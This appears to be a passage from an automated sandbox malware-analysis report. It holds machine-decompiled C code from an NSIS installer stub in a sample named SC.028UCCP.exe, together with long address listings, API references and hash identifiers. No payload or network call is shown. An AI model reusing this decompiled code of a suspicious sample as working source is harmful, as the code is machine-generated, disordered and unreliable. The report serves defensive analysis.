						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                  0x00402c3b
                                  0x00402c3e
                                  0x00402c41
                                  0x00402c44
                                  0x00402c4a
                                  0x00402c5b
                                  0x00402c60
                                  0x00402c73
                                  0x00402c78
                                  0x00402c7b
                                  0x00402c81
                                  0x00000000
                                  0x00402c83
                                  0x00402c8e
                                  0x00402c94
                                  0x00402ca5
                                  0x00402cac
                                  0x00402cb2
                                  0x00402cb4
                                  0x00402cb9
                                  0x00402cbb
                                  0x00402da8
                                  0x00402daa
                                  0x00402daf
                                  0x00402db6
                                  0x00000000
                                  0x00000000
                                  0x00402db8
                                  0x00402dbb
                                  0x00402ddf
                                  0x00402de4
                                  0x00402dea
                                  0x00402dec
                                  0x00402df5
                                  0x00402dfa
                                  0x00402dfd
                                  0x00402dfe
                                  0x00402dff
                                  0x00402e01
                                  0x00402e06
                                  0x00402e09
                                  0x00402e1c
                                  0x00402e20
                                  0x00402e28
                                  0x00402e2d
                                  0x00402e2f
                                  0x00402e2f
                                  0x00402e2f
                                  0x00402e37
                                  0x00402e37
                                  0x00402e3a
                                  0x00402e3b
                                  0x00402e3b
                                  0x00402e3e
                                  0x00402e40
                                  0x00402e40
                                  0x00402e40
                                  0x00402e4a
                                  0x00402e50
                                  0x00402e5e
                                  0x00402e63
                                  0x00000000
                                  0x00402e63
                                  0x00000000
                                  0x00402e09
                                  0x00402dc3
                                  0x00402dce
                                  0x00402dd3
                                  0x00402dd5
                                  0x00000000
                                  0x00000000
                                  0x00402dda
                                  0x00402ddd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402cc1
                                  0x00402cc6
                                  0x00402cc6
                                  0x00402ccb
                                  0x00402ccf
                                  0x00402cd6
                                  0x00402cdb
                                  0x00402cdd
                                  0x00402cdf
                                  0x00402cdf
                                  0x00402ce3
                                  0x00402ce8
                                  0x00402cea
                                  0x00402e14
                                  0x00402e0b
                                  0x00000000
                                  0x00402e0b
                                  0x00402cf0
                                  0x00402cf7
                                  0x00402d73
                                  0x00402d77
                                  0x00402d7b
                                  0x00402d80
                                  0x00000000
                                  0x00402d77
                                  0x00402d00
                                  0x00402d05
                                  0x00402d08
                                  0x00402d0d
                                  0x00000000
                                  0x00000000
                                  0x00402d0f
                                  0x00402d16
                                  0x00000000
                                  0x00000000
                                  0x00402d18
                                  0x00402d1f
                                  0x00000000
                                  0x00000000
                                  0x00402d21
                                  0x00402d28
                                  0x00000000
                                  0x00000000
                                  0x00402d2a
                                  0x00402d31
                                  0x00000000
                                  0x00000000
                                  0x00402d33
                                  0x00402d39
                                  0x00402d42
                                  0x00402d48
                                  0x00402d4b
                                  0x00402d4d
                                  0x00402d53
                                  0x00000000
                                  0x00000000
                                  0x00402d59
                                  0x00402d5d
                                  0x00402d65
                                  0x00402d65
                                  0x00402d68
                                  0x00402d68
                                  0x00402d6b
                                  0x00402d6d
                                  0x00402d6f
                                  0x00402d6f
                                  0x00000000
                                  0x00402d6d
                                  0x00402d5f
                                  0x00402d63
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402d81
                                  0x00402d81
                                  0x00402d87
                                  0x00402d93
                                  0x00402d93
                                  0x00402d96
                                  0x00402d9c
                                  0x00402d9e
                                  0x00402d9e
                                  0x00402da6
                                  0x00402da6
                                  0x00000000
                                  0x00402da6

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402C44
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SC.028UCCP.exe,00000400), ref: 00402C60
                                    • Part of subcall function 00405846: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 0040584A
                                    • Part of subcall function 00405846: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040586C
                                  • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SC.028UCCP.exe,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 00402CAC
                                  Strings
                                  • soft, xrefs: 00402D21
                                  • Inst, xrefs: 00402D18
                                  • C:\Users\user\Desktop\SC.028UCCP.exe, xrefs: 00402C4A, 00402C59, 00402C6D, 00402C8D
                                  • C:\Users\user\Desktop, xrefs: 00402C8E, 00402C93, 00402C99
                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                  • Null, xrefs: 00402D2A
                                  • Error launching installer, xrefs: 00402C83
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                  • "C:\Users\user\Desktop\SC.028UCCP.exe", xrefs: 00402C33
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SC.028UCCP.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                  • API String ID: 4283519449-3078379064
                                  • Opcode ID: e1ae569de8707ad257aa271524bc1f490828c5d2cae056f7a9dfb35c885d2983
                                  • Instruction ID: 8bc35dde1f4d805c720579c209d35afe3860aa9343481584d03e725a70eefc79
                                  • Opcode Fuzzy Hash: e1ae569de8707ad257aa271524bc1f490828c5d2cae056f7a9dfb35c885d2983
                                  • Instruction Fuzzy Hash: 5A51E571900204ABDB209F65DE89B9E7BA8EB04355F10403FFD05B22D1D7BCAE418BAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10001A86 Relevance: 18.5, APIs: 12, Instructions: 510stringmemorylibraryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E10001A86() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				CHAR* _t184;
				signed int _t186;
				signed int _t187;
				void* _t190;
				void* _t192;
				CHAR* _t194;
				void* _t202;
				struct HINSTANCE__* _t203;
				signed int _t204;
				signed int _t206;
				struct HINSTANCE__* _t207;
				signed int _t209;
				void* _t210;
				void* _t222;
				signed char _t223;
				void* _t228;
				signed int _t230;
				void* _t231;
				void* _t232;
				void* _t236;
				void* _t239;
				signed int _t241;
				void* _t248;
				void* _t249;
				void* _t252;
				signed int _t257;
				signed char _t260;
				void _t261;
				void* _t262;
				void* _t273;
				void* _t274;
				void* _t278;
				void* _t279;
				void* _t283;
				void* _t284;
				void* _t285;
				void* _t286;
				signed char _t289;
				signed int _t290;
				CHAR* _t291;
				CHAR* _t293;
				CHAR* _t294;
				struct HINSTANCE__* _t295;
				void* _t297;
				void* _t298;

				_t257 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v12 = 0;
				_v40 = 0;
				_t298 = 0;
				_v48 = 0;
				_t184 = E10001215();
				_v24 = _t184;
				_v28 = _t184;
				_v44 = E10001215();
				_t186 = E1000123B();
				_v56 = _t186;
				_v8 = _t186;
				while(1) {
					_t187 = _v32;
					_t290 = 3;
					_v52 = _t187;
					if(_t187 != _t257 && _t298 == _t257) {
						break;
					}
					_t289 =  *_v8;
					_t260 = _t289;
					_t190 = _t260 - _t257;
					if(_t190 == 0) {
						_v32 = _v32 | 0xffffffff;
						L13:
						_t192 = _v52 - _t257;
						if(_t192 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							if(_t298 == _t257) {
								_t228 = GlobalAlloc(0x40, 0x14a4); // executed
								_t298 = _t228;
								 *(_t298 + 0x810) = _t257;
								 *(_t298 + 0x814) = _t257;
							}
							_t261 = _v36;
							_t40 = _t298 + 8; // 0x8
							_t194 = _t40;
							_t41 = _t298 + 0x408; // 0x408
							_t291 = _t41;
							 *_t298 = _t261;
							 *_t194 =  *_t194 & 0x00000000;
							 *(_t298 + 0x808) = _t257;
							 *_t291 =  *_t291 & 0x00000000;
							_t262 = _t261 - _t257;
							 *(_t298 + 0x80c) = _t257;
							 *(_t298 + 4) = _t257;
							if(_t262 == 0) {
								if(_v28 == _v24) {
									goto L56;
								}
								_t297 = 0;
								GlobalFree(_t298);
								_t298 = E1000131B(_v24);
								if(_t298 == _t257) {
									goto L56;
								} else {
									goto L28;
								}
								while(1) {
									L28:
									_t222 =  *(_t298 + 0x14a0);
									if(_t222 == _t257) {
										break;
									}
									_t297 = _t298;
									_t298 = _t222;
									if(_t298 != _t257) {
										continue;
									}
									break;
								}
								if(_t297 != _t257) {
									 *(_t297 + 0x14a0) = _t257;
								}
								_t223 =  *(_t298 + 0x810);
								if((_t223 & 0x00000008) == 0) {
									 *(_t298 + 0x810) = _t223 | 0x00000002;
								} else {
									_t298 = E10001551(_t298);
									 *(_t298 + 0x810) =  *(_t298 + 0x810) & 0xfffffff5;
								}
								goto L56;
							} else {
								_t273 = _t262 - 1;
								if(_t273 == 0) {
									L24:
									lstrcpyA(_t194, _v44);
									L25:
									lstrcpyA(_t291, _v24);
									L56:
									_v28 = _v24;
									L57:
									_v8 = _v8 + 1;
									if(_v32 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t274 = _t273 - 1;
								if(_t274 == 0) {
									goto L25;
								}
								if(_t274 != 1) {
									goto L56;
								}
								goto L24;
							}
						}
						if(_t192 == 1) {
							_t230 = _v16;
							if(_v40 == _t257) {
								_t230 = _t230 - 1;
							}
							 *(_t298 + 0x814) = _t230;
						}
						goto L56;
					}
					_t231 = _t190 - 0x23;
					if(_t231 == 0) {
						_v32 = _t257;
						_v36 = _t257;
						goto L13;
					}
					_t232 = _t231 - 5;
					if(_t232 == 0) {
						_v32 = 1;
						_v12 = _t257;
						_v20 = _t257;
						_v16 = (0 | _v36 == _t290) + 1;
						_v40 = _t257;
						goto L13;
					}
					_t236 = _t232 - 1;
					if(_t236 == 0) {
						_v32 = 2;
						_v12 = _t257;
						_v20 = _t257;
						goto L13;
					}
					if(_t236 != 0x16) {
						_t239 = _v32 - _t257;
						if(_t239 == 0) {
							if(_t289 == 0x2a) {
								_v36 = 2;
								L55:
								_t257 = 0;
								goto L56;
							}
							if(_t289 == 0x2d) {
								L125:
								_t241 = _v8 + 1;
								if( *_t241 != 0x3e) {
									L127:
									_t241 = _v8 + 1;
									if( *_t241 != 0x3a || _t289 == 0x2d) {
										L134:
										_v28 =  &(_v28[1]);
										 *_v28 = _t289;
										goto L57;
									} else {
										_v36 = 1;
										L130:
										_v8 = _t241;
										if(_v28 <= _v24) {
											 *_v44 =  *_v44 & 0x00000000;
										} else {
											 *_v28 =  *_v28 & 0x00000000;
											lstrcpyA(_v44, _v24);
										}
										goto L55;
									}
								}
								_v36 = _t290;
								goto L130;
							}
							if(_t289 != 0x3a) {
								goto L134;
							}
							if(_t289 != 0x2d) {
								goto L127;
							}
							goto L125;
						}
						_t248 = _t239 - 1;
						if(_t248 == 0) {
							L68:
							_t249 = _t260 - 0x22;
							if(_t249 > 0x55) {
								goto L55;
							}
							switch( *((intOrPtr*)(( *(_t249 + 0x1000210f) & 0x000000ff) * 4 +  &M100020AF))) {
								case 0:
									__eax = _v24;
									__edi = _v8;
									while(1) {
										__edi = __edi + 1;
										_v8 = __edi;
										__cl =  *__edi;
										if(__cl == __dl &&  *(__edi + 1) != __dl) {
											break;
										}
										if(__cl == 0) {
											break;
										}
										if(__cl == __dl) {
											__edi = __edi + 1;
										}
										__cl =  *__edi;
										 *__eax =  *__edi;
										__eax = __eax + 1;
									}
									 *__eax =  *__eax & 0x00000000;
									__ebx = E10001224(_v24);
									goto L84;
								case 1:
									_v12 = 1;
									goto L55;
								case 2:
									_v12 = _v12 | 0xffffffff;
									goto L55;
								case 3:
									_v12 = _v12 & 0x00000000;
									_v20 = _v20 & 0x00000000;
									_v16 = _v16 + 1;
									goto L73;
								case 4:
									if(_v20 != 0) {
										goto L55;
									}
									_v8 = _v8 - 1;
									__ebx = E10001215();
									 &_v8 = E10001A24( &_v8);
									__eax = E10001446(__edx, __eax, __edx, __ebx);
									goto L84;
								case 5:
									L92:
									_v20 = _v20 + 1;
									goto L55;
								case 6:
									_push(0x19);
									goto L120;
								case 7:
									_push(0x15);
									goto L120;
								case 8:
									_push(0x16);
									goto L120;
								case 9:
									_push(0x18);
									goto L120;
								case 0xa:
									_push(5);
									goto L100;
								case 0xb:
									__eax = 0;
									__eax = 1;
									goto L78;
								case 0xc:
									_push(6);
									goto L100;
								case 0xd:
									_push(2);
									goto L100;
								case 0xe:
									_push(3);
									goto L100;
								case 0xf:
									_push(0x17);
									L120:
									_pop(__ebx);
									goto L85;
								case 0x10:
									__eax =  &_v8;
									__eax = E10001A24( &_v8);
									__ebx = __eax;
									__ebx = __eax + 1;
									if(__ebx < 0xb) {
										__ebx = __ebx + 0xa;
									}
									goto L84;
								case 0x11:
									__ebx = 0xffffffff;
									goto L85;
								case 0x12:
									_v48 = _v48 + 1;
									_push(3);
									_pop(__eax);
									goto L78;
								case 0x13:
									__eax = 0;
									goto L78;
								case 0x14:
									_push(4);
									L100:
									_pop(__eax);
									L78:
									__edi = _v16;
									__ecx =  *((intOrPtr*)(0x10003058 + __eax * 4));
									__edi = _v16 << 5;
									__edx = 0;
									__edi = (_v16 << 5) + __esi;
									__edx = 1;
									_v40 = 1;
									 *(__edi + 0x818) = __eax;
									if(_v12 == 0xffffffff || __ecx <= 0) {
										__ecx = __edx;
									}
									 *((intOrPtr*)(__edi + 0x828)) = __ecx;
									if(_v12 == __edx) {
										__eax =  &_v8;
										__eax = E10001A24( &_v8);
										_v12 = __eax;
									}
									__eax = _v12;
									 *((intOrPtr*)(__edi + 0x81c)) = _v12;
									_t126 = _v16 + 0x41; // 0x41
									_t126 = _t126 << 5;
									__eax = 0;
									 *((intOrPtr*)((_t126 << 5) + __esi)) = 0;
									 *((intOrPtr*)(__edi + 0x82c)) = 0;
									 *((intOrPtr*)(__edi + 0x830)) = 0;
									goto L84;
								case 0x15:
									_t251 =  *(_t298 + 0x814);
									if(_t251 > _v16) {
										_v16 = _t251;
									}
									_v12 = _v12 & 0x00000000;
									_v20 = _v20 & 0x00000000;
									if(_t251 != (0 | _v36 == 0x00000003)) {
										L73:
										_v40 = 1;
									}
									goto L55;
								case 0x16:
									__eax =  &_v8;
									__eax = E10001A24( &_v8);
									__ebx = __eax;
									__ebx = __eax + 1;
									L84:
									if(__ebx == 0) {
										goto L55;
									}
									L85:
									_v40 = 1;
									if(_v20 == 0) {
										_v16 = _v16 << 5;
										_t134 = __esi + 0x82c; // 0x82c
										__edi = (_v16 << 5) + _t134;
										__eax =  *__edi;
										if(__eax <= 0xffffffff || __eax > 0x19) {
											__eax = GlobalFree(__eax);
										}
										 *__edi = __ebx;
									}
									if(_v20 == 1) {
										_v16 = _v16 << 5;
										 *((_v16 << 5) + __esi + 0x830) = __ebx;
									}
									goto L92;
								case 0x17:
									goto L55;
							}
						}
						_t252 = _t248 - 1;
						if(_t252 == 0) {
							_v16 = _t257;
							goto L68;
						}
						if(_t252 != 1) {
							goto L134;
						}
						_t278 = _t260 - 0x21;
						if(_t278 == 0) {
							_v12 =  ~_v12;
							goto L55;
						}
						_t279 = _t278 - 0x42;
						if(_t279 == 0) {
							L51:
							if(_v12 != 1) {
								 *(_t298 + 0x810) =  *(_t298 + 0x810) &  !0x00000001;
							} else {
								 *(_t298 + 0x810) =  *(_t298 + 0x810) | 1;
							}
							_v12 = 1;
							goto L55;
						}
						_t283 = _t279;
						if(_t283 == 0) {
							_push(0x20);
							L50:
							_pop(1);
							goto L51;
						}
						_t284 = _t283 - 9;
						if(_t284 == 0) {
							_push(8);
							goto L50;
						}
						_push(4);
						_pop(1);
						_t285 = _t284 - 1;
						if(_t285 == 0) {
							goto L51;
						}
						_t286 = _t285 - 1;
						if(_t286 == 0) {
							_push(0x10);
							goto L50;
						}
						if(_t286 != 0) {
							goto L55;
						}
						_push(0x40);
						goto L50;
					} else {
						_v32 = _t290;
						_v12 = 1;
						goto L13;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t298 == _t257 ||  *(_t298 + 0x80c) != _t257) {
					L148:
					return _t298;
				} else {
					_t202 =  *_t298 - 1;
					if(_t202 == 0) {
						_t171 = _t298 + 8; // 0x8
						_t293 = _t171;
						if( *_t293 != 0) {
							_t203 = GetModuleHandleA(_t293);
							 *(_t298 + 0x808) = _t203;
							if(_t203 != _t257) {
								L144:
								_t176 = _t298 + 0x408; // 0x408
								_t294 = _t176;
								_t204 = E100015C1( *(_t298 + 0x808), _t294);
								 *(_t298 + 0x80c) = _t204;
								if(_v48 != _t257 || _t204 == _t257) {
									_t294[lstrlenA(_t294)] = 0x41;
									_t206 = E100015C1( *(_t298 + 0x808), _t294);
									if(_t206 != _t257) {
										L138:
										 *(_t298 + 0x80c) = _t206;
										goto L148;
									}
									L147:
									 *(_t298 + 4) =  *(_t298 + 4) | 0xffffffff;
								}
								goto L148;
							}
							_t207 = LoadLibraryA(_t293);
							 *(_t298 + 0x808) = _t207;
							if(_t207 == _t257) {
								goto L147;
							}
							goto L144;
						}
						_t172 = _t298 + 0x408; // 0x408
						_t209 = E1000131B(_t172);
						 *(_t298 + 0x80c) = _t209;
						if(_t209 != _t257) {
							goto L148;
						}
						goto L147;
					}
					_t210 = _t202 - 1;
					if(_t210 == 0) {
						_t169 = _t298 + 0x408; // 0x408
						_t211 = _t169;
						if( *_t169 == 0) {
							goto L148;
						}
						_t206 = E1000131B(_t211);
						L137:
						goto L138;
					}
					if(_t210 != 1) {
						goto L148;
					}
					_t73 = _t298 + 8; // 0x8
					_t258 = _t73;
					_t295 = E1000131B(_t73);
					 *(_t298 + 0x808) = _t295;
					if(_t295 == 0) {
						goto L147;
					}
					 *(_t298 + 0x850) =  *(_t298 + 0x850) & 0x00000000;
					 *((intOrPtr*)(_t298 + 0x84c)) = E10001224(_t258);
					 *(_t298 + 0x83c) =  *(_t298 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t298 + 0x848)) = 1;
					 *((intOrPtr*)(_t298 + 0x838)) = 1;
					_t82 = _t298 + 0x408; // 0x408
					_t206 =  *(_t295->i + E1000131B(_t82) * 4);
					goto L137;
				}
			}





























































                                  0x10001a8e
                                  0x10001a91
                                  0x10001a94
                                  0x10001a97
                                  0x10001a9a
                                  0x10001a9d
                                  0x10001aa0
                                  0x10001aa2
                                  0x10001aa5
                                  0x10001aaa
                                  0x10001aad
                                  0x10001ab5
                                  0x10001ab8
                                  0x10001abd
                                  0x10001ac0
                                  0x10001ac3
                                  0x10001ac3
                                  0x10001aca
                                  0x10001acb
                                  0x10001ace
                                  0x00000000
                                  0x00000000
                                  0x10001adb
                                  0x10001add
                                  0x10001ae2
                                  0x10001ae4
                                  0x10001b3d
                                  0x10001b41
                                  0x10001b44
                                  0x10001b46
                                  0x10001b68
                                  0x10001b6d
                                  0x10001b76
                                  0x10001b7c
                                  0x10001b7e
                                  0x10001b84
                                  0x10001b84
                                  0x10001b8a
                                  0x10001b8d
                                  0x10001b8d
                                  0x10001b90
                                  0x10001b90
                                  0x10001b96
                                  0x10001b98
                                  0x10001b9b
                                  0x10001ba1
                                  0x10001ba4
                                  0x10001ba6
                                  0x10001bac
                                  0x10001baf
                                  0x10001bdd
                                  0x00000000
                                  0x00000000
                                  0x10001be4
                                  0x10001be6
                                  0x10001bf4
                                  0x10001bf9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x10001bff
                                  0x10001bff
                                  0x10001bff
                                  0x10001c07
                                  0x00000000
                                  0x00000000
                                  0x10001c09
                                  0x10001c0b
                                  0x10001c0f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x10001c0f
                                  0x10001c13
                                  0x10001c15
                                  0x10001c15
                                  0x10001c1b
                                  0x10001c23
                                  0x10001c39
                                  0x10001c25
                                  0x10001c2b
                                  0x10001c2e
                                  0x10001c2e
                                  0x00000000
                                  0x10001bb1
                                  0x10001bb1
                                  0x10001bb2
                                  0x10001bbe
                                  0x10001bc2
                                  0x10001bc8
                                  0x10001bcc
                                  0x10001cb2
                                  0x10001cb5
                                  0x10001cb8
                                  0x10001cb8
                                  0x10001cbf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x10001cbf
                                  0x10001bb4
                                  0x10001bb5
                                  0x00000000
                                  0x00000000
                                  0x10001bb8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x10001bb8
                                  0x10001baf
                                  0x10001b49
                                  0x10001b52
                                  0x10001b55
                                  0x10001b62
                                  0x10001b62
                                  0x10001b57
                                  0x10001b57
                                  0x00000000
                                  0x10001b49
                                  0x10001ae6
                                  0x10001ae9
                                  0x10001b35
                                  0x10001b38
                                  0x00000000
                                  0x10001b38
                                  0x10001aeb
                                  0x10001aee
                                  0x10001b1c
                                  0x10001b23
                                  0x10001b2a
                                  0x10001b2d
                                  0x10001b30
                                  0x00000000
                                  0x10001b30
                                  0x10001af0
                                  0x10001af1
                                  0x10001b08
                                  0x10001b0f
                                  0x10001b12
                                  0x00000000
                                  0x10001b12
                                  0x10001af6
                                  0x10001c44
                                  0x10001c46
                                  0x10001f80
                                  0x10001fe1
                                  0x10001cb0
                                  0x10001cb0
                                  0x00000000
                                  0x10001cb0
                                  0x10001f85
                                  0x10001f91
                                  0x10001f94
                                  0x10001f98
                                  0x10001f9f
                                  0x10001fa2
                                  0x10001fa6
                                  0x10001fed
                                  0x10001ff0
                                  0x10001ff3
                                  0x00000000
                                  0x10001fad
                                  0x10001fad
                                  0x10001fb4
                                  0x10001fb4
                                  0x10001fbd
                                  0x10001fd9
                                  0x10001fbf
                                  0x10001fc8
                                  0x10001fcb
                                  0x10001fcb
                                  0x00000000
                                  0x10001fbd
                                  0x10001fa6
                                  0x10001f9a
                                  0x00000000
                                  0x10001f9a
                                  0x10001f8a
                                  0x00000000
                                  0x00000000
                                  0x10001f8f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x10001f8f
                                  0x10001c4c
                                  0x10001c4d
                                  0x10001d74
                                  0x10001d74
                                  0x10001d7c
                                  0x00000000
                                  0x00000000
                                  0x10001d89
                                  0x00000000
                                  0x10001f25
                                  0x10001f28
                                  0x10001f2b
                                  0x10001f2b
                                  0x10001f2c
                                  0x10001f2f
                                  0x10001f33
                                  0x00000000
                                  0x00000000
                                  0x10001f3c
                                  0x00000000
                                  0x00000000
                                  0x10001f40
                                  0x10001f42
                                  0x10001f42
                                  0x10001f43
                                  0x10001f45
                                  0x10001f47
                                  0x10001f47
                                  0x10001f4d
                                  0x10001f56
                                  0x00000000
                                  0x00000000
                                  0x10001dd0
                                  0x00000000
                                  0x00000000
                                  0x10001ddc
                                  0x00000000
                                  0x00000000
                                  0x10001dc3
                                  0x10001dc7
                                  0x10001dcb
                                  0x00000000
                                  0x00000000
                                  0x10001efb
                                  0x00000000
                                  0x00000000
                                  0x10001f01
                                  0x10001f09
                                  0x10001f10
                                  0x10001f18
                                  0x00000000
                                  0x00000000
                                  0x10001e94
                                  0x10001e94
                                  0x00000000
                                  0x00000000
                                  0x10001f75
                                  0x00000000
                                  0x00000000
                                  0x10001f65
                                  0x00000000
                                  0x00000000
                                  0x10001f69
                                  0x00000000
                                  0x00000000
                                  0x10001f71
                                  0x00000000
                                  0x00000000
                                  0x10001eb7
                                  0x00000000
                                  0x00000000
                                  0x10001e9c
                                  0x10001e9e
                                  0x00000000
                                  0x00000000
                                  0x10001ebf
                                  0x00000000
                                  0x00000000
                                  0x10001ea4
                                  0x00000000
                                  0x00000000
                                  0x10001ea8
                                  0x00000000
                                  0x00000000
                                  0x10001f6d
                                  0x10001f77
                                  0x10001f77
                                  0x00000000
                                  0x00000000
                                  0x10001ec7
                                  0x10001ecb
                                  0x10001ed0
                                  0x10001ed3
                                  0x10001ed7
                                  0x10001edd
                                  0x10001edd
                                  0x00000000
                                  0x00000000
                                  0x10001f5d
                                  0x00000000
                                  0x00000000
                                  0x10001eac
                                  0x10001eaf
                                  0x10001eb1
                                  0x00000000
                                  0x00000000
                                  0x10001de5
                                  0x00000000
                                  0x00000000
                                  0x10001ebb
                                  0x10001ec1
                                  0x10001ec1
                                  0x10001de7
                                  0x10001de7
                                  0x10001dea
                                  0x10001df1
                                  0x10001df4
                                  0x10001df6
                                  0x10001df8
                                  0x10001dfd
                                  0x10001e00
                                  0x10001e06
                                  0x10001e0c
                                  0x10001e0c
                                  0x10001e11
                                  0x10001e17
                                  0x10001e19
                                  0x10001e1d
                                  0x10001e24
                                  0x10001e24
                                  0x10001e27
                                  0x10001e2a
                                  0x10001e33
                                  0x10001e36
                                  0x10001e39
                                  0x10001e3b
                                  0x10001e3e
                                  0x10001e44
                                  0x00000000
                                  0x00000000
                                  0x10001d90
                                  0x10001d99
                                  0x10001d9b
                                  0x10001d9b
                                  0x10001d9e
                                  0x10001da2
                                  0x10001db1
                                  0x10001db7
                                  0x10001db7
                                  0x10001db7
                                  0x00000000
                                  0x00000000
                                  0x10001ee5
                                  0x10001ee9
                                  0x10001eee
                                  0x10001ef1
                                  0x10001e4a
                                  0x10001e4c
                                  0x00000000
                                  0x00000000
                                  0x10001e52
                                  0x10001e56
                                  0x10001e5d
                                  0x10001e62
                                  0x10001e65
                                  0x10001e65
                                  0x10001e6c
                                  0x10001e71
                                  0x10001e79
                                  0x10001e79
                                  0x10001e7f
                                  0x10001e7f
                                  0x10001e85
                                  0x10001e8a
                                  0x10001e8d
                                  0x10001e8d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x10001d89
                                  0x10001c53
                                  0x10001c54
                                  0x10001d71
                                  0x00000000
                                  0x10001d71
                                  0x10001c5b
                                  0x00000000
                                  0x00000000
                                  0x10001c61
                                  0x10001c64
                                  0x10001cad
                                  0x00000000
                                  0x10001cad
                                  0x10001c66
                                  0x10001c69
                                  0x10001c91
                                  0x10001c97
                                  0x10001d63
                                  0x10001c9d
                                  0x10001c9d
                                  0x10001c9d
                                  0x10001d69
                                  0x00000000
                                  0x10001d69
                                  0x10001c6c
                                  0x10001c6d
                                  0x10001c8e
                                  0x10001c90
                                  0x10001c90
                                  0x00000000
                                  0x10001c90
                                  0x10001c6f
                                  0x10001c72
                                  0x10001c8a
                                  0x00000000
                                  0x10001c8a
                                  0x10001c74
                                  0x10001c76
                                  0x10001c77
                                  0x10001c79
                                  0x00000000
                                  0x00000000
                                  0x10001c7b
                                  0x10001c7c
                                  0x10001c86
                                  0x00000000
                                  0x10001c86
                                  0x10001c80
                                  0x00000000
                                  0x00000000
                                  0x10001c82
                                  0x00000000
                                  0x10001afc
                                  0x10001afc
                                  0x10001aff
                                  0x00000000
                                  0x10001aff
                                  0x10001af6
                                  0x10001cce
                                  0x10001cd3
                                  0x10001cd8
                                  0x10001cdc
                                  0x100020a8
                                  0x100020ae
                                  0x10001cee
                                  0x10001cf0
                                  0x10001cf1
                                  0x1000201b
                                  0x1000201b
                                  0x10002021
                                  0x1000203d
                                  0x10002045
                                  0x1000204b
                                  0x1000205e
                                  0x1000205e
                                  0x1000205e
                                  0x1000206b
                                  0x10002075
                                  0x1000207b
                                  0x10002089
                                  0x10002095
                                  0x1000209e
                                  0x10002010
                                  0x10002010
                                  0x00000000
                                  0x10002010
                                  0x100020a4
                                  0x100020a4
                                  0x100020a4
                                  0x00000000
                                  0x1000207b
                                  0x1000204e
                                  0x10002056
                                  0x1000205c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1000205c
                                  0x10002023
                                  0x1000202a
                                  0x10002032
                                  0x10002038
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1000203a
                                  0x10001cf7
                                  0x10001cf8
                                  0x10001ffa
                                  0x10001ffa
                                  0x10002003
                                  0x00000000
                                  0x00000000
                                  0x1000200a
                                  0x1000200f
                                  0x00000000
                                  0x1000200f
                                  0x10001cff
                                  0x00000000
                                  0x00000000
                                  0x10001d05
                                  0x10001d05
                                  0x10001d0e
                                  0x10001d13
                                  0x10001d19
                                  0x00000000
                                  0x00000000
                                  0x10001d1f
                                  0x10001d2c
                                  0x10001d32
                                  0x10001d3c
                                  0x10001d42
                                  0x10001d4a
                                  0x10001d5a
                                  0x00000000
                                  0x10001d5a

                                  APIs
                                    • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,00000001), ref: 1000121D
